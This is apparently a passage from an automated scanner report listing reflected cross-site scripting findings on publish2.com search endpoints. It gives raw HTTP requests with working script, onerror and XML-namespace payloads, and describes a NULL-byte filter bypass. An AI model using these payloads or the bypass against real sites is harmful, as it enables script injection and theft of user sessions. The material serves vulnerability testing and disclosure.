HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:15:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:15:47 GMT; path=/ Set-Cookie: kohanasession=q5trom0f7bb2kq1si0f4o9p7s7; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJxNXRyb20wZjdiYjJrcTFzaTBmNG85cDdzNyI7dG90YWxfaGl0c3xpOjM7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNDg7; path=/ Content-Length: 7840 Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="button RSS" href="/search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=54d376"><script>alert(1)</script>55c0ff8b4ca&callback=jsonp1292504943065"> ...[SNIP]...
The value of the tag request parameter is copied into the HTML document as plain text between tags. The payload 995a1<script>alert(1)</script>7d913aca67c was submitted in the tag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/links?newsgroup=jeff+jarvis+links&tag=wwgd995a1<script>alert(1)</script>7d913aca67c&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTY7
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:15:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:15:47 GMT; path=/ Set-Cookie: kohanasession=s16hd7ufqbn20cglu92o0bsas0; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJzMTZoZDd1ZnFibjIwY2dsdTkybzBic2FzMCI7dG90YWxfaGl0c3xpOjM7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNDg7; path=/ Content-Length: 7402 Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <strong class="active">wwgd995a1<script>alert(1)</script>7d913aca67c</strong> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f2898<script>alert(1)</script>852eec1b1c was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/links.js?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065f2898<script>alert(1)</script>852eec1b1c HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:47 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:46 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:46 GMT; path=/ Set-Cookie: kohanasession=dkobbj8ikt6dkucplqbeftblo7; path=/ Set-Cookie: kohanasession=dkobbj8ikt6dkucplqbeftblo7; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJka29iYmo4aWt0NmRrdWNwbHFiZWZ0YmxvNyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNzs%3D; path=/ Content-Length: 713 Connection: close Content-Type: application/json; charset=utf-8
2.374. http://www.publish2.com/search/links.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.publish2.com
Path:
/search/links.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0024e9d<a>087e3093433 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24e9d<a>087e3093433 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /search/links.js?%0024e9d<a>087e3093433=1 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:42 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:42 GMT; path=/ Set-Cookie: kohanasession=rnodfgv1jj13rfl0bhbi1i0sd2; path=/ Set-Cookie: kohanasession=rnodfgv1jj13rfl0bhbi1i0sd2; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJybm9kZmd2MWpqMTNyZmwwYmhiaTFpMHNkMiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMzs%3D; path=/ Content-Length: 5518 Connection: close Content-Type: application/json; charset=utf-8
{"title":"Publish2 Links","feedlink":"http:\/\/www.publish2.com\/search\/links.js?%0024e9d<a>087e3093433=1","sitelink":"http:\/\/www.publish2.com\/","description":"Publish2 Links","last_build_date":"Thu, 16 Dec 2010 13:16:43 +0000","total_feed_items":206584,"generator":"Publish2","items":[{"title":"Memo_ ...[SNIP]...
The value of the newsgroup request parameter is copied into the HTML document as plain text between tags. The payload c22e5<img%20src%3da%20onerror%3dalert(1)>24d8948e107 was submitted in the newsgroup parameter. This input was echoed as c22e5<img src=a onerror=alert(1)>24d8948e107 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/links.js?newsgroup=jeff+jarvis+linksc22e5<img%20src%3da%20onerror%3dalert(1)>24d8948e107&tag=wwgd&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/ Set-Cookie: kohanasession=1o0a8nd8cu1bq2qa4t1rg6m8u2; path=/ Set-Cookie: kohanasession=1o0a8nd8cu1bq2qa4t1rg6m8u2; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIxbzBhOG5kOGN1MWJxMnFhNHQxcmc2bTh1MiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNTs%3D; path=/ Content-Length: 690 Connection: close Content-Type: application/json; charset=utf-8
The value of the number_of_items request parameter is copied into the HTML document as plain text between tags. The payload 55314<img%20src%3da%20onerror%3dalert(1)>4153ae7be26 was submitted in the number_of_items parameter. This input was echoed as 55314<img src=a onerror=alert(1)>4153ae7be26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/links.js?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=555314<img%20src%3da%20onerror%3dalert(1)>4153ae7be26&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:47 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:46 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:46 GMT; path=/ Set-Cookie: kohanasession=65isubias4p31p7r47cihukc90; path=/ Set-Cookie: kohanasession=65isubias4p31p7r47cihukc90; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI2NWlzdWJpYXM0cDMxcDdyNDdjaWh1a2M5MCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNzs%3D; path=/ Content-Length: 690 Connection: close Content-Type: application/json; charset=utf-8
The value of the tag request parameter is copied into the HTML document as plain text between tags. The payload c4543<img%20src%3da%20onerror%3dalert(1)>7b29acd748d was submitted in the tag parameter. This input was echoed as c4543<img src=a onerror=alert(1)>7b29acd748d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/links.js?newsgroup=jeff+jarvis+links&tag=wwgdc4543<img%20src%3da%20onerror%3dalert(1)>7b29acd748d&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:45 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:45 GMT; path=/ Set-Cookie: kohanasession=lhie7od7am2r0k1rjor9phdq05; path=/ Set-Cookie: kohanasession=lhie7od7am2r0k1rjor9phdq05; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJsaGllN29kN2FtMnIwazFyam9yOXBoZHEwNSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNjs%3D; path=/ Content-Length: 690 Connection: close Content-Type: application/json; charset=utf-8
The value of the callback request parameter is copied into the XML document as plain text between tags. The payload fe996<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6a0e24ab617 was submitted in the callback parameter. This input was echoed as fe996<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6a0e24ab617 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065fe996<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6a0e24ab617 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:39 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:38 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:38 GMT; path=/ Set-Cookie: kohanasession=f89rm5pjn8ii21t103vgit9li1; path=/ Set-Cookie: kohanasession=f89rm5pjn8ii21t103vgit9li1; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJmODlybTVwam44aWkyMXQxMDN2Z2l0OWxpMSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5OTs%3D; path=/ Content-Length: 1346 Connection: close Content-Type: application/rss+xml; charset=utf-8
2.379. http://www.publish2.com/search/links.rss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.publish2.com
Path:
/search/links.rss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004f739<a>c8fee2c080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4f739<a>c8fee2c080 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /search/links.rss?%004f739<a>c8fee2c080=1 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:36 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:36 GMT; path=/ Set-Cookie: kohanasession=prs7auoe19rcsg6csh64hs4gu1; path=/ Set-Cookie: kohanasession=prs7auoe19rcsg6csh64hs4gu1; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJwcnM3YXVvZTE5cmNzZzZjc2g2NGhzNGd1MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5Nzs%3D; path=/ Content-Length: 4390 Connection: close Content-Type: application/rss+xml; charset=utf-8
The value of the newsgroup request parameter is copied into the XML document as plain text between tags. The payload 1c4e8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>75a8caa1d8c was submitted in the newsgroup parameter. This input was echoed as 1c4e8<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>75a8caa1d8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /search/links.rss?newsgroup=jeff+jarvis+links1c4e8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>75a8caa1d8c&tag=wwgd&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
